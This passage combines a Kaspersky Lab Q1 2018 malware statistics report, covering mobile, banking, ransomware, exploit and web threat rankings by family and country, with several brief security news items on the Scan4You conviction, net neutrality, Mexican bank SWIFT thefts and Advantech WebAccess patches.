282,807,433 unique URLs were recognized as malicious by Web Anti-Virus components.
Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 204,448 users.
Ransomware attacks were registered on the computers of 179,934 unique users.
Our File Anti-Virus logged 187,597,494 unique malicious and potentially unwanted objects.
Kaspersky Lab products for mobile devices detected:
1,322,578 malicious installation packages
18,912 installation packages for mobile banking Trojans
8,787 installation packages for mobile ransomware Trojans
Mobile threats
Q1 events
In Q1 2018, DNS-hijacking, a new in-the-wild method for spreading mobile malware on Android devices, was identified. As a result of hacked routers and modified DNS settings, users were redirected to IP addresses belonging to the cybercriminals, where they were prompted to download malware disguised, for example, as browser updates. That is how the Korean banking Trojan Wroba was distributed.

This malicious resource shows a fake window while displaying the legitimate site in the address bar

It wasn’t a drive-by-download case, since the success of the attack largely depended on actions by the victim, such as installing and running the Trojan. But it’s interesting to note that some devices (routers) were used to attack other devices (smartphones), all sprinkled with social engineering to make it more effective.

However, a far greater splash in Q1 was caused by the creators of a seemingly legitimate app called GetContact.

Some backstory to begin with. Various families and classes of malicious apps are known to gather data from infected devices: it could be a relatively harmless IMEI number, phone book contents, SMS correspondence, or even WhatsApp chats. All the above (and much more besides) is personal information that only the mobile phone owner should have control over. However, the creators of GetContact concocted a license agreement giving them the right to download the user’s phone book to their servers and grant all their subscribers access to it. As a result, anyone could find out what name GetContact users had saved their phone number under, often with sad consequences. Let’s hope that the app creators had the noble intention of protecting users from telephone spam and fraudulent calls, but simply chose the wrong means to do so.

Mobile threat statistics
In Q1 2018, Kaspersky Lab detected 1,322,578 malicious installation packages, down 11% against the previous quarter.

Number of detected malicious installation packages, Q2 2017 – Q1 2018

Distribution of newly detected mobile apps by type, Q4 2017 and Q1 2018

Among all the threats detected in Q1 2018, the lion’s share belonged to potentially unwanted RiskTool apps (49.3%); compared to the previous quarter, their share fell by 5.5%. Members of the RiskTool.AndroidOS.SMSreg family contributed most to this indicator.

Second place was taken by Trojan-Dropper threats (21%), whose share doubled. Most detected files of this type came from the Trojan-Dropper.AndroidOS.Piom family.

Advertising apps, which ranked second in Q4 2017, dropped a place—their share decreased by 8%, accounting for 11% of all detected threats.

On a separate note, Q1 saw a rise in the share of mobile banking threats. This was due to the mass distribution of Trojan-Banker.AndroidOS.Faketoken.z.

TOP 20 mobile malware
Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware.

Verdict %*
1 DangerousObject.Multi.Generic 70.17
2 Trojan.AndroidOS.Boogr.gsh 12.92
3 Trojan.AndroidOS.Agent.rx 5.55
4 Trojan-Dropper.AndroidOS.Lezok.p 5.23
5 Trojan-Dropper.AndroidOS.Hqwar.ba 2.95
6 Trojan.AndroidOS.Triada.dl 2.94
7 Trojan-Dropper.AndroidOS.Hqwar.i 2.51
8 Trojan.AndroidOS.Piom.rfw 2.13
9 Trojan-Dropper.AndroidOS.Lezok.t 2.06
10 Trojan.AndroidOS.Piom.pnl 1.78
11 Trojan-Dropper.AndroidOS.Agent.ii 1.76
12 Trojan-SMS.AndroidOS.FakeInst.ei 1.64
13 Trojan-Dropper.AndroidOS.Hqwar.gen 1.50
14 Trojan-Ransom.AndroidOS.Zebt.a 1.48
15 Trojan.AndroidOS.Piom.qmx 1.47
16 Trojan.AndroidOS.Dvmap.a 1.40
17 Trojan-SMS.AndroidOS.Agent.xk 1.35
18 Trojan.AndroidOS.Triada.snt 1.24
19 Trojan-Dropper.AndroidOS.Lezok.b 1.22
20 Trojan-Dropper.AndroidOS.Tiny.d 1.22
* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab’s mobile antivirus that were attacked.

As before, first place in our TOP 20 went to DangerousObject.Multi.Generic (70.17%), the verdict we use for malware detected using cloud technologies. Cloud technologies work when the anti-virus databases lack data for detecting a piece of malware, but the cloud of the anti-virus company already contains information about the object. This is basically how the latest malicious programs are detected.

In second place was Trojan.AndroidOS.Boogr.gsh (12.92%). This verdict is given to files recognized as malicious by our system based on machine learning.

Third was Trojan.AndroidOS.Agent.rx (5.55%). Operating in background mode, this Trojan’s task is to covertly visit web pages as instructed by its C&C.

Fourth and fifth places went to the Trojan matryoshkas Trojan-Dropper.AndroidOS.Lezok.p (5.2%) and Trojan-Dropper.AndroidOS.Hqwar.ba (2.95%), respectively. Note that in Q1 threats like Trojan-Dropper effectively owned the TOP 20, occupying eight positions in the rating. The main tasks of such droppers are to drop a payload on the victim, avoid detection by security software, and complicate the reverse engineering process. In the case of Lezok, an aggressive advertising app acts as the payload, while Hqwar can conceal a banking Trojan or ransomware.

Sixth place in the rating was taken by the unusual Trojan Triada.dl (2.94%) from the Trojan.AndroidOS.Triada family of modular-designed malware, which we have written about many times. The Trojan was notable for its highly sophisticated attack vector: it modified the main system library libandroid_runtime.so so that malicious code started when any debugging output was written to the system event log. Devices with the modified library ended up on store shelves, thus ensuring that the infection began early. The capabilities of Triada.dl are almost limitless: it can be embedded in apps already installed and pinch data from them, and it can show the user fake data in “clean” apps.

The Trojan ransomware Trojan-Trojan-Ransom.AndroidOS.Zebt.a (1.48%) finished 14th. It features a quaint set of functions, including hiding the icon at startup and requesting device administrator rights to counteract deletion. Like other such mobile ransomware, the malware is distributed under the guise of a porn app.

Another interesting resident in the TOP 20 is Trojan-SMS.AndroidOS.Agent.xk (1.35%), which operates like the SMS Trojans of 2011. The malware displays a welcome screen offering various services, generally access to content. At the bottom in fine print it is written that the services are fee-based and subscription to them is via SMS.

Map of attempted infections using mobile malware in Q1 2018 (percentage of attacked users in the country)

TOP 10 countries by share of users attacked by mobile malware:

Country* %**
1 China 34.43
2 Bangladesh 27.53
3 Nepal 27.37
4 Ivory Coast 27.16
5 Nigeria 25.36
6 Algeria 24.13
7 Tanzania 23.61
8 India 23.27
9 Indonesia 22.01
10 Kenya 21.45
* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000).
** Unique users attacked in the country as a percentage of all users of Kaspersky Lab’s mobile antivirus in the country.

In Q1 2018, China (34.43%) topped the list by share of mobile users attacked. Note that China is a regular fixture in the TOP 10 rating by number of attacked users: It came sixth in 2017, and fourth in 2016. As in 2017, second place was claimed by Bangladesh (27.53%). The biggest climber was Nepal (27.37%), rising from ninth place last year to third.

Russia (8.18%) this quarter was down in 39th spot, behind Qatar (8.22%) and Vietnam (8.48%).

The safest countries (based on proportion of mobile users attacked) are Denmark (1.85%) and Japan (1%).

Mobile banking Trojans
In the reporting period, we detected 18,912 installation packages for mobile banking Trojans, which is 1.3 times more than in Q4 2017.

Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q2 2017 – Q1 2018

Verdict %*
1 Trojan-Banker.AndroidOS.Asacub.bj 12.36
2 Trojan-Banker.AndroidOS.Svpeng.q 9.17
3 Trojan-Banker.AndroidOS.Asacub.bk 7.82
4 Trojan-Banker.AndroidOS.Svpeng.aj 6.63
5 Trojan-Banker.AndroidOS.Asacub.e 5.93
6 Trojan-Banker.AndroidOS.Hqwar.t 5.38
7 Trojan-Banker.AndroidOS.Faketoken.z 5.15
8 Trojan-Banker.AndroidOS.Svpeng.ai 4.54
9 Trojan-Banker.AndroidOS.Agent.di 4.31
10 Trojan-Banker.AndroidOS.Asacub.ar 3.52
* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab’s mobile antivirus that were attacked by banking threats.

The most popular mobile banking Trojan in Q1 was Asacub.bj (12.36%), nudging ahead of second-place Svpeng.q (9.17%). Both these Trojans use phishing windows to steal bank card and authentication data for online banking. They also steal money through SMS services, including mobile banking.

Note that the TOP 10 mobile banking threats in Q1 is largely made up of members of the Asacub (4 out of 10) and Svpeng (3 out of 10) families. However, Trojan-Banker.AndroidOS.Faketoken.z also entered the list. This Trojan has extensive spy capabilities: it can install other apps, intercept incoming messages (or create them on command), make calls and USSD requests, and, of course, open links to phishing pages.

Geography of mobile banking threats in Q1 2018 (percentage of attacked users)

TOP 10 countries by share of users attacked by mobile banking Trojans

Country* %**
1 Russia 0.74
2 USA 0.65
3 Tajikistan 0.31
4 Uzbekistan 0.30
5 China 0.26
6 Turkey 0.22
7 Ukraine 0.22
8 Kazakhstan 0.22
9 Poland 0.17
10 Moldova 0.16
* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000).
** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab’s mobile antivirus in this country.

The Q1 2018 rating was much the same as the situation observed throughout 2017: Russia (0.74%) remained top.

The US (0.65%) and Tajikistan (0.31%) took silver and bronze, respectively. The most popular mobile banking Trojans in these countries were various modifications of the Trojan-Banker.AndroidOS.Svpeng family, as well Trojan-Banker.AndroidOS.Faketoken.z.

Mobile ransomware Trojans
In Q1 2018, we detected 8,787 installation packages for mobile ransomware Trojans, which is just over half the amount seen in the previous quarter and 22 times less than in Q2 2017. This significant drop is largely because attackers began to make more use of droppers in an attempt to hinder detection and hide the payload. As a result, such malware is detected as a dropper (for example, from the Trojan-Dropper.AndroidOS.Hqwar family), even though it may contain mobile ransomware or a “banker.”

Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab (Q2 2017 – Q1 2018)

Note that despite the decline in their total number, ransomware Trojans remain a serious threat — technically they are now far more advanced and dangerous. For instance, Trojan-Trojan-Ransom.AndroidOS.Svpeng acquires device administrator rights and locks the smartphone screen with a PIN if an attempt is made to remove them. If no PIN is set (could also be a graphic, numeric, or biometric lock), the device is locked. In this case, the only way to restore the smartphone to working order is to reset the factory settings.

The most widespread mobile ransomware in Q1 was Trojan-Ransom.AndroidOS.Zebt.a — it was encountered by more than half of all users. In second place was Trojan-Ransom.AndroidOS.Fusob.h, having held pole position for a long time. The once popular Trojan-Ransom.AndroidOS.Svpeng.ab only managed fifth place, behind Trojan-Ransom.AndroidOS.Egat.d and Trojan-Ransom.AndroidOS.Small.snt. Incidentally, Egat.d is a pared-down version of Zebt.a, both have the same creators.

Geography of mobile ransomware Trojans in Q1 2018 (percentage of attacked users)

TOP 10 countries by share of users attacked by mobile ransomware Trojans:

Country* %**
1 Kazakhstan 0.99
2 Italy 0.64
3 Ireland 0.63
4 Poland 0.61
5 Belgium 0.56
6 Austria 0.38
7 Romania 0.37
8 Hungary 0.34
9 Germany 0.33
10 Switzerland 0.29
* Excluded from the rating are countries where the number of users of Kaspersky Lab’s mobile antivirus is relatively small (fewer than 10,000)
** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab’s mobile antivirus in the country.

First place in the TOP 10 again went to Kazakhstan (0.99%); the most active family in this country was Trojan-Ransom.AndroidOS.Small. Second came Italy (0.64%), where most attacks were the work of Trojan-Ransom.AndroidOS.Zebt.a, which is also the most popular mobile ransomware in third-place Ireland (0.63%).

Vulnerable apps used by cybercriminals
In Q1 2018, we observed some major changes in the distribution of exploits launched against users. The share of Microsoft Office exploits (47.15%) more than doubled compared with the average for 2017. This is also twice the quarterly score of the permanent leader in recent years — browser exploits (23.47%). The reason behind the sharp increase is clear: over the past year, so many different vulnerabilities have been found and exploited in Office applications, that it can only be compared to amount of Adobe Flash vulnerabilities found in the past. But lately the share of Flash exploits has been decreasing (2.57% in Q1), since Adobe and Microsoft are doing all they can to hinder the exploitation of Flash Player.

Distribution of exploits used in attacks by type of application attacked, Q1 2018

The most frequently used vulnerability in Microsoft Office in Q1 was CVE-2017-11882 — a stack overflow-type vulnerability in Equation Editor, a rather old component in the Office suite. Attacks using this vulnerability make up approximately one-sixth of all exploit-based attacks. This is presumably because CVE-2017-11882 exploitation is fairly reliable. Plus, the bytecode processed by Equation Editor allows the use of various obfuscations, which increases the chances of bypassing the protection and launching a successful attack (Kaspersky Lab’s Equation file format parser easily handles all currently known obfuscations). Another vulnerability found in Equation Editor this quarter was CVE-2018-0802. It too is exploited, but less actively. The following exploits for logical vulnerabilities in Office found in 2017 were also encountered: CVE-2017-8570, CVE-2017-8759, CVE-2017-0199. But even their combined number of attacks does not rival CVE-2017-11882.

As for zero-day exploits in Q1, CVE-2018-4878 was reported by a South Korean CERT and several other sources in late January. This is an Adobe Flash vulnerability originally used in targeted attacks (supposedly by the Scarcruft group). At the end of the quarter, an exploit for it appeared in the widespread GreenFlash Sundown, Magnitude, and RIG exploit kits. In targeted attacks, a Flash object with the exploit was embedded in a Word document, while exploit kits distribute it via web pages.

Large-scale use of network exploits using vulnerabilities patched by the MS17-010 update (those that exploited EternalBlue and other vulnerabilities from the Shadow Brokers leak) also continued throughout the quarter. MS17-010 exploits account for more than 25% of all network attacks that we registered.

Malicious programs online (attacks via web resources)
The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected.

Online threats in the financial sector
Q1 events
In early 2018, the owners of the Trojan Dridex were particularly active. Throughout its years-long existence, this malware has acquired a solid infrastructure. Today, its main line of activity is compromising credentials for online banking services with subsequent theft of funds from bank accounts. Its accomplice is fellow banking Trojan Emotet. Discovered in 2014, this malware also belongs to a new breed of banking Trojans developed from scratch. However, it was located on the same network infrastructure as Dridex, suggesting a close link between the two families. But now Emotet has lost its banking functions and is used by attackers as a spam bot and loader with Dridex as the payload. Early this year, it was reported that the encryptor BitPaymer (discovered last year) was developed by the same group behind Dridex. As a result, the malware was rebranded FriedEx.

Q1 saw the arrest of the head of the criminal group responsible for the Carbanak and Cobalt malware attacks, it was reported by Europol. Starting in 2013, the criminal group attacked more than 40 organizations, causing damage to the financial industry estimated at more than EUR 1 billion. The main attack vector was to penetrate the target organization’s network by sending employees spear-phishing messages with malicious attachments. Having penetrated the internal network via the infected computers, the cybercriminals gained access to the ATM control servers, and through them to the ATMs themselves. Access to the infrastructure, servers, and ATMs allowed the cybercriminals to dispense cash without the use of bank cards, transfer money from the organisation to criminal accounts, and inflate bank balances with money mules being used to collect the proceeds.

Financial threat statistics
These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data. As of Q1 2017, the statistics include malicious programs for ATMs and POS terminals, but do not include mobile threats.

In Q1 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 204,448 users.

Number of unique users attacked by financial malware, Q1 2018

Geography of attacks
To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.

Geography of banking malware attacks in Q1 2018 (percentage of attacked users)

TOP 10 countries by percentage of attacked users

Country* % of users attacked**
1 Cameroon 2.1
2 Germany 1.7
3 South Korea 1.5
4 Libya 1.5
5 Togo 1.5
6 Armenia 1.4
7 Georgia 1.4
8 Moldova 1.2
9 Kyrgyzstan 1.2
10 Indonesia 1.1
These statistics are based on Anti-Virus detection verdicts received from users of Kaspersky Lab products who consented to provide statistical data.
Excluded are countries with relatively few Kaspersky Lab’ product users (under 10,000).
** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country.

TOP 10 banking malware families
TOP 10 malware families used to attack online banking users in Q1 2018 (by share of attacked users):

Name Verdicts* % of attacked users**
1 Zbot Trojan.Win32. Zbot 28.0%
2 Nymaim Trojan.Win32. Nymaim 20.3%
3 Caphaw Backdoor.Win32. Caphaw 15.2%
4 SpyEye Backdoor.Win32. SpyEye 11.9%
5 NeutrinoPOS Trojan-Banker.Win32.NeutrinoPOS 4.5%
6 Emotet Backdoor.Win32. Emotet 2.4%
7 Neurevt Trojan.Win32. Neurevt 2.3%
8 Shiz Backdoor.Win32. Shiz 2.1%
9 Gozi Trojan.Win32. Gozi 1.9%
10 ZAccess Backdoor.Win32. ZAccess 1.3%
* Detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data.
** Unique users attacked by this malware as a percentage of all users attacked by financial malware.

In Q1 2018, TrickBot departed the rating to be replaced by Emotet (2.4%), also known as Heodo. Trojan.Win32.Zbot (28%) and Trojan.Win32.Nymaim (20.3%) remain in the lead, while Trojan.Win32.Neurevt (2.3%), also known as Betabot, suffered a major slide. Meanwhile, Caphaw (15.2%) and NeutrinoPOS (4.5%) climbed significantly, as did their Q1 activity.

Cryptoware programs
Q1 events
Q1 2018 passed without major incidents or mass cryptoware epidemics. The highlight was perhaps the emergence and widespread occurrence of a new Trojan called GandCrab. Notable features of the malware include:

Use of C&C servers in the .bit domain zone (this top-level domain is supported by an alternative decentralized DNS system based on Namecoin technology)
Ransom demand in the cryptocurrency Dash
GandCrab was first detected in January. The cybercriminals behind it used spam emails and exploit kits to deliver the cryptoware to victim computers.

The RaaS (ransomware as a service) distribution model continues to attract malware developers. In February, for example, there appeared a new piece of ransomware called Data Keeper, able to be distributed by any cybercriminal who so desired. Via a special resource on the Tor network, the creators of Data Keeper made it possible to generate executable files of the Trojan for subsequent distribution by “affilate program” participants. A dangerous feature of this malware is its ability to automatically propagate inside a local network. Despite this, Data Keeper did not achieve widespread distribution in Q1.

One notable success in the fight against cryptoware came from Europe: with the assistance of Kaspersky Lab, Belgian police managed to locate and confiscate a server used by the masterminds behind the Trojan Cryakl. Following the operation, Kaspersky Lab was given several private RSA keys required to decrypt files encrypted with certain versions of the Trojan. As a result, we were able to develop a tool to assist victims.

Number of new modifications
In Q1 2018, there appeared several new cryptors, but only one, GandCrab, was assigned a new family in our classification. The rest, which are not widely spread, continue to be detected with generic verdicts.

Number of new cryptoware modifications, Q2 2017 – Q1 2018

The number of new modifications fell sharply against previous quarters. The trend indicates that cybercriminals using this type of malware are becoming less active.

Number of users attacked by Trojan cryptors
During the reporting period, Kaspersky Lab products blocked cryptoware attacks on the computers of 179,934 unique users. Despite fewer new Trojan modifications, the number of attacked users did not fall against Q3.

Number of unique users attacked by cryptors, Q1 2018

Geography of attacks

TOP 10 countries attacked by Trojan cryptors

Country* % of users attacked by cryptors**
1 Uzbekistan 1.12
2 Angola 1.11
3 Vietnam 1.04
4 Venezuela 0.95
5 Indonesia 0.95
6 Pakistan 0.93
7 China 0.87
8 Azerbaijan 0.75
9 Bangladesh 0.70
10 Mongolia 0.64
* Excluded are countries with relatively few Kaspersky Lab users (under 50,000).
** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country.

The makeup of the rating differs markedly from 2017. That said, most positions were again filled by Asian countries, while Europe did not have a single representative in the TOP 10 countries attacked by cryptors.

Despite not making the TOP 10 last year, Uzbekistan (1.12%) and Angola (1.11%) came first and second. Vietnam (1.04%) moved from second to third, Indonesia (0.95%) from third to fifth, and China (0.87%) from fifth to seventh, while Venezuela (0.95%) climbed from eighth to fourth.

TOP 10 most widespread cryptor families

Name Verdicts* % of attacked users**
1 WannaCry Trojan-Ransom.Win32.Wanna 38.33
2 PolyRansom/VirLock Virus.Win32.PolyRansom 4.07
3 Cerber Trojan-Ransom.Win32.Zerber 4.06
4 Cryakl Trojan-Ransom.Win32.Cryakl 2.99
5 (generic verdict) Trojan-Ransom.Win32.Crypren 2.77
6 Shade Trojan-Ransom.Win32.Shade 2.61
7 Purgen/GlobeImposter Trojan-Ransom.Win32.Purgen 1.64
8 Crysis Trojan-Ransom.Win32.Crusis 1.62
9 Locky Trojan-Ransom.Win32.Locky 1.23
10 (generic verdict) Trojan-Ransom.Win32.Gen 1.15
* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data.
** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors.

This quarter, the rating is again topped by WannaCry (38.33%), extending its already impressive lead. Second place was claimed by PolyRansom (4.07%), also known as VirLock, a worm that’s been around for a while. This malware substitutes user files with modified instances of its own body, and places victim data inside these copies in an encrypted format. Statistics show that a new modification detected in December immediately began to attack user computers.

The remaining TOP 10 positions are taken by Trojans already known from previous reports: Cerber, Cryakl, Purgen, Crysis, Locky, and Shade.

Countries that are sources of web-based attacks: TOP 10
The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks.

To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q1 2018, Kaspersky Lab solutions blocked 796,806,112 attacks launched from Internet resources located in 194 countries worldwide. 282,807,433 unique URLs were recognized as malicious by Web Anti-Virus components. These indicators are significantly higher than in previous quarters. This is largely explained by the large number of triggers in response to attempts to download web miners, which came to prominence towards the end of last year and continue to outweigh other web threats.

Distribution of web attack sources by country, Q1 2018

This quarter, Web Anti-Virus was most active on resources located in the US (39.14%). Canada, China, Ireland, and Ukraine dropped out of TOP 10 to be replaced by Luxembourg (1.33%), Israel (0.99%), Sweden (0.96%), and Singapore (0.91%).

Countries where users faced the greatest risk of online infection
To assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious programs that fall under the Malware class; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of attacked users**
1 Belarus 40.90
2 Ukraine 40.32
3 Algeria 39.69
4 Albania 37.33
5 Moldova 37.17
6 Greece 36.83
7 Armenia 36.78
8 Azerbaijan 35.13
9 Kazakhstan 34.64
10 Russia 34.56
11 Kyrgyzstan 33.77
12 Venezuela 33.10
13 Uzbekistan 31.52
14 Georgia 31.40
15 Latvia 29.85
16 Tunisia 29.77
17 Romania 29.09
18 Qatar 28.71
19 Vietnam 28.66
20 Serbia 28.55
These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data.
* Excluded are countries with relatively few Kaspersky Lab users (under 10,000).
** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country.

On average, 23.69% of Internet user computers worldwide experienced at least one Malware-class attack.

Geography of malicious web attacks in Q1 2018 (percentage of attacked users)

The countries with the safest surfing environments included Iran (9.06%), Singapore (8.94%), Puerto Rico (6.67%), Niger (5.14%), and Cuba (4.44%).

Local threats
Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q1 2018, our File Anti-Virus detected 187,597,494 malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

The rating includes only Malware-class attacks. It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of attacked users**
1 Uzbekistan 57.03
2 Afghanistan 56.02
3 Yemen 54.99
4 Tajikistan 53.08
5 Algeria 49.07
6 Turkmenistan 48.68
7 Ethiopia 48.21
8 Mongolia 46.84
9 Kyrgyzstan 46.53
10 Sudan 46.44
11 Vietnam 46.38
12 Syria 46.12
13 Rwanda 46.09
14 Laos 45.66
15 Libya 45.50
16 Djibouti 44.96
17 Iraq 44.65
18 Mauritania 44.55
19 Kazakhstan 44.19
20 Bangladesh 44.15
These statistics are based on detection verdicts returned by OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data include detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera and phone memory cards, or external hard drives.
* Excluded are countries with relatively few Kaspersky Lab users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country.

On average, 23.39% of computers globally faced at least one Malware-class local threat in Q1.

The figure for Russia was 30.92%.

The safest countries in terms of infection risk included Estonia (15.86%), Singapore (11.97%), New Zealand (9.24%), Czech Republic (7.89%), Ireland (6.86%), and Japan (5.79%).


U.S. Jury Convicts Operator of Counter AV Service Scan4You
17.5.2018 securityweek  Crime

A 37-year-old Latvian resident was convicted by a U.S. jury on Wednesday for his role in the operation of a counter antivirus service named Scan4You. Sentencing is scheduled for September 21.

Ruslans Bondars, a citizen of the former USSR, had been residing in Riga, Latvia, when he was arrested in May 2017 along with Russian national Jurijs Martisevs. Martisevs was on a trip to Latvia when he was taken into custody.

Bondars and Martisevs were accused of running the Scan4You service, which helped cybercriminals test their malware to ensure that it would not be detected by cybersecurity products.

Bondars was convicted on Wednesday on one count of conspiracy to violate the Computer Fraud and Abuse Act (CFAA), one count of conspiracy to commit wire fraud, and one count of computer intrusion with intent to cause damage and aiding and abetting.

Martisevs pleaded guilty in March to conspiracy, for which he faces up to 5 years in prison, and aiding and abetting computer intrusions, for which he faces 10 years in prison. His sentencing is scheduled for July.

According to Trend Micro, whose experts helped authorities investigate Scan4You, the service was launched in 2009 and was active until the arrests of its operators. An unnamed individual from Great Falls, Virginia, was also allegedly involved.

Bondars (known online as b0rland and Borland) and Martisevs (known online as Garrik) started their cybercrime career in at least 2006, and they managed to turn Scan4You into one of the largest counter antivirus services, with thousands of customers.

Scan4You allowed cybercriminals to conduct 100,000 scans per month for $30 and $0.15 for single scans. The service was also popular among counter antivirus resellers such as Indetectables, RazorScanner and reFUD.me.

Trend Micro says Bondars and Martisevs were also involved with a shady online pharmacy and launched their own banking malware campaigns.

However, they did a poor job at hiding their identity. Bondars, for instance, used the same Gmail account to register command and control (C&C) domains for his banking malware and to create a Facebook account. The Gmail account contained his real name and profile photo.

According to authorities, Scan4You was used to test the malware involved in the massive 2013 breach at the U.S. retailer Target. The service was also used in the development of Citadel, a banking trojan that infected over 11 million computers worldwide, which resulted in over $500 million in fraud-related losses.


U.S. Senate Votes to Restore 'Net Neutrality' Rules
17.5.2018 securityweek  BigBrothers

The US Senate voted Wednesday to restore so-called "net neutrality" rules aimed at requiring all online data to be treated equally, the latest step in a years-long battle on internet regulation.

The 52-47 vote is likely to be symbolic, however, since the measure faces an uphill battle in the House of Representatives and would need enough lawmaker support to overturn a probable presidential veto.

The vote marked the latest step in a contentious fight over rules governing online access over the past decade including court challenges and various moves by regulators.

Related: Security Implications of the End of Net Neutrality

In December, the Federal Communications Commission voted 3-2 along party lines to reverse a 2015 order which established net neutrality and which itself had faced court challenges and intense partisan debate.

In the Senate, three Republicans joined Democrats in the vote under the Congressional Review Act, which allows lawmakers to overturn a regulatory body.

FCC chairman Ajit Pai, appointed by President Donald Trump, has argued that the 2015 rules were "heavy-handed" and failed to take into account the rapidly changing landscape for online services and were discouraging investment in advanced networks.

Net neutrality backers have argued that clear rules are needed to prevent internet service providers from blocking or throttling services or websites for competitive reasons.

Some activists fear internet service providers will seek to extract higher fees from services that are heavy data users, like Netflix or other streaming services, with these costs passed on to consumers.

The battle has been largely along party lines, and has also been split with large tech firms supporting neutrality and telecom operators backing more flexible rules.

Although the Senate vote may not succeed in restoring neutrality rules, backers said it would allow voters to know where their lawmakers stand.

Democratic Senator Ed Markey said on Twitter the vote would "show the American people who sides with them, and who sides with the powerful special interests and corporate donors who are thriving under the @realDonaldTrump administration."

Ferras Vinh of the Center for Democracy & Technology, a digital rights group, welcomed the vote.

"Without net neutrality protections, internet service providers will have an explicit license to block, slow, or levy tolls on content, which will limit choices for internet users and suffocate small businesses looking to enter the market," Vinh said.

"These protections are the guiding principles of the open internet, facilitating innovation and enabling the spread of new ideas."

But USTelecom, an industry group representing major broadband carriers, expressed disappointment.

"This vote throws into reverse our shared goal of maintaining an open, thriving internet," said association president Jonathan Spalter.

"Consumers want permanent, comprehensive online protections, not half measures or election-year posturing from our representatives in Congress."


Mexican central bank confirmed that SWIFT hackers stole millions of dollars from Mexican Banks
17.5.2018 securityaffairs Hacking

The head of the Mexican central bank, Alejandro Diaz de Leon announced this week that hackers were involved in shadowy transfers of between $18 million and $20 million.
Mexican central bank is the last victim of the SWIFT hackers, officials at the bank confirmed this week that hackers hit the payments system and stole millions of dollars from domestic banks.

The attack was discovered in late April and presents many similarities with past attacks against the SWIFT systems.

The Mexican central bank did not disclose the name of the banks that were hit by the cyber attack and did not detail the overall amount of money that crooks have stolen.

According to Alejandro Diaz de Leon, head of Mexico’s central bank, crooks were able to complete illicit transactions of $18 million to $20 million.

“Central bank Governor Alejandro Diaz de Leon said on Monday that the country had seen an unprecedented attack on payment system connections and that he hoped that measures being taken would stop future incidents.” reported the Reuters.

“A source close to the government’s investigation said more than 300 million had been siphoned out of banks, but it was not clear how much had subsequently been taken out in cash withdrawals.”

Mexican central bank cyberheist

According to reports, Mexico’s central following the latest cyber attacks has created a cybersecurity division, and it has instituted a one-day waiting period on electronic funds transfers of more than $2,500.

“Perhaps, some financial institutions perceived the attacks in Bangladesh as something very distant,” said Alejandro Diaz de Leon who believes that some Mexican banks may not have invested in sufficient security measures.

“But criminals look for vulnerability and once they see it they are going to exploit it.”

Mexican depositors won’t be affected, but the overall losses for the local banks could be greater than initially thought.


Critical Code Execution Flaws Patched in Advantech WebAccess

16.5.2018 securityweek  Vulnerebility

Taiwan-based industrial automation company Advantech has released an update for its WebAccess product to address nearly a dozen vulnerabilities, including critical flaws that allow arbitrary code execution.

Advantech WebAccess is a browser-based software package for human-machine interfaces (HMI) and supervisory control and data acquisition (SCADA) systems. The product is used in the United States, Europe and East Asia in the energy, critical manufacturing, and water and wastewater sectors.

The list of security holes rated critical includes unrestricted file upload, path traversal, stack-based buffer overflow, and untrusted pointer dereference issues, all of which can be exploited for arbitrary code execution.

Advantech has also fixed high severity vulnerabilities that can be exploited to obtain sensitive information, modify files, and delete files. There are also a couple of medium severity issues that can be leveraged to steal session cookies and obtain potentially sensitive data through SQL injection.

